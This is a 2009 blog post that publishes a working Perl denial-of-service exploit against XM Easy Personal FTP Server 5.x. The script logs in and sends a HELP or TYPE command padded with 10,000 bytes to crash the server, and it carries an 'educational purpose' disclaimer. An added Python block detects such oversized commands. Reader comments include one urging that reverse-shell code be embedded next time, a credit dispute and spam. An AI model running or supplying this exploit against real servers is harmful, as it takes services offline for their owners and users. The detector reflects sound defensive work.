XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit
by Vinod Sharma on Jun.09, 2009, under MyHacks
#!/usr/bin/perl -w
####################################################################
# XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service
# via a "HELP" or "TYPE" command with an overly long argument.
# Refer:
# http://secunia.com/advisories/35271/
# http://downloads.securityfocus.com/vulnerabilities/exploits/35239-2.pl
#
# Product link: http://www.dxm2008.com/
# Vulnerability discovered by: NeerajT of Nevis Labs
# http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$
#$$$$$Author will not bear any responsibility for any damages whatsoever.$$$$$$$$$$$$$$
#
# Author: Vinod Sharma
# Email: vinodsharma[underscore]mimit[at]gmail.com
# Blog: http://securitygyan.com/
# Date: 09th June, 2009
#
#
###Thanks to all the Security Folks###
###################################################################
use strict;
use IO::Socket;

# Check the argument count before reading @ARGV.
if (@ARGV != 5)
{
    print "\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n";
    print "\nargument command can have a value HELP or TYPE\n";
    print "\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP\n";
    exit;
}
my ($server_ip, $server_port, $username, $password, $command) = @ARGV;

# The command verb followed by 10000 "A" bytes as the overly long argument.
my $buffer = $command . " " . "\x41" x 10000 . "\r\n";

my $socket = IO::Socket::INET->new(PeerAddr => $server_ip, PeerPort => $server_port, Proto => 'tcp')
    or die "Couldn't connect to Server\n";
my ($recv_data, $recv_data1, $recv_data2, $recv_data3);

# Read the server banner, then log in.
$socket->recv($recv_data, 1024);
print "RECEIVED: $recv_data";
$socket->send("USER " . $username . "\r\n");
$socket->recv($recv_data1, 1024);
print "RECEIVED: $recv_data1";
$socket->send("PASS " . $password . "\r\n");
$socket->recv($recv_data2, 1024);
print "RECEIVED: $recv_data2";

# Send the oversized command once and read whatever the server returns.
$socket->send($buffer);
print "\nAttack is sent...\n";
$socket->recv($recv_data3, 1024);
print "RECEIVED: $recv_data3";
close $socket;
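
A defender-side check for the traffic this script produces, added here as an example that is not part of the original post: it scans the client side of an FTP control connection and flags HELP or TYPE commands whose argument is far longer than any legitimate use. It also goes slightly beyond the post by applying a general line-length cap to every other command; the limits, function name and sample session are assumptions constructed for illustration.

```python
# Added example: flag oversized FTP commands in a client-to-server control stream.
# The limits below are assumed policy values, not taken from the advisory.
MAX_LINE = 512                        # cap for any command line, in bytes
MAX_ARG = {b"HELP": 64, b"TYPE": 8}   # tighter caps for the two affected verbs


def scan_control_stream(data: bytes):
    """Return (verb, arg_len, reason) tuples for suspicious command lines.

    `data` is the reassembled client side of one FTP control connection.
    Arguments are never echoed back, so PASS values do not leak into alerts.
    """
    findings = []
    # A final fragment with no CRLF is still inspected, because a sender
    # may never terminate the oversized line.
    for raw in data.split(b"\r\n"):
        if not raw:
            continue
        verb, _, arg = raw.partition(b" ")
        verb = verb.upper()                           # FTP verbs are case-insensitive
        label = verb[:16].decode("ascii", "replace")  # bound the reported verb
        if verb in MAX_ARG and len(arg) > MAX_ARG[verb]:
            findings.append((label, len(arg), "argument over per-verb cap"))
        elif len(raw) > MAX_LINE:
            findings.append((label, len(arg), "line over maximum length"))
    return findings


# Constructed sample session (not a real capture).
SAMPLE = (
    b"USER anonymous\r\n"
    b"PASS 123456\r\n"
    b"TYPE I\r\n"
    b"help " + b"A" * 10000 + b"\r\n"
    b"CWD " + b"x" * 600 + b"\r\n"
    b"type " + b"B" * 9000          # unterminated final line
)

if __name__ == "__main__":
    for verb, arg_len, reason in scan_control_stream(SAMPLE):
        print(f"ALERT {verb}: {arg_len}-byte argument ({reason})")
```

The same length test can sit in a proxy in front of the server, where an over-limit line is dropped before it reaches the FTP daemon.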

June 10th, 2009 on 3:56 pm
New exploit code published ..Good
Next time make it large..embedding Reverse shell code
Regards,
Vikrant
June 10th, 2009 on 8:40 pm
Thanks for posting, I’ll definitely be subscribing to your blog.
June 11th, 2009 on 9:35 am
BTW.. An exploit for this vulnerability was already published on http://downloads.securityfocus.com/vulnerabilities/exploits/35239.py
Next time, it would be nice if you give credit to the original author who discovered the vulnerability!
Cheers,
DaH4cker
http://hypersecurity.blogspot.com
June 11th, 2009 on 5:58 pm
First of all, I was not able to find a single exploit for this vulnerability; that’s why I wrote an exploit. Second, there was no reference mentioned about your exploit code in the Secunia advisory from where I came to know about this vuln.
To give credit to the original author (you), I have edited my post.
Thanks for your comment.
June 12th, 2009 on 4:50 am
Another one on the go.
Keep the good work going
June 12th, 2009 on 7:49 pm
Hey, nice post, very well written. You should post more about this. I’ll certainly be subscribing.
June 12th, 2009 on 10:58 pm
The article is useful for me. I’ll be coming back to your blog.
June 17th, 2009 on 10:15 pm
Hey, nice post, very well written. You should post more about this.
February 3rd, 2010 on 2:20 am
I found your web site when I was searching for something unrelated, but this page was one of the first sites listed in Yahoo, your website must be insanely popular! Keep up the awesome job!
September 3rd, 2010 on 1:50 am
Well, I agree with what you wrote, but not with all of it. Regardless, it is all very good material. Thanks!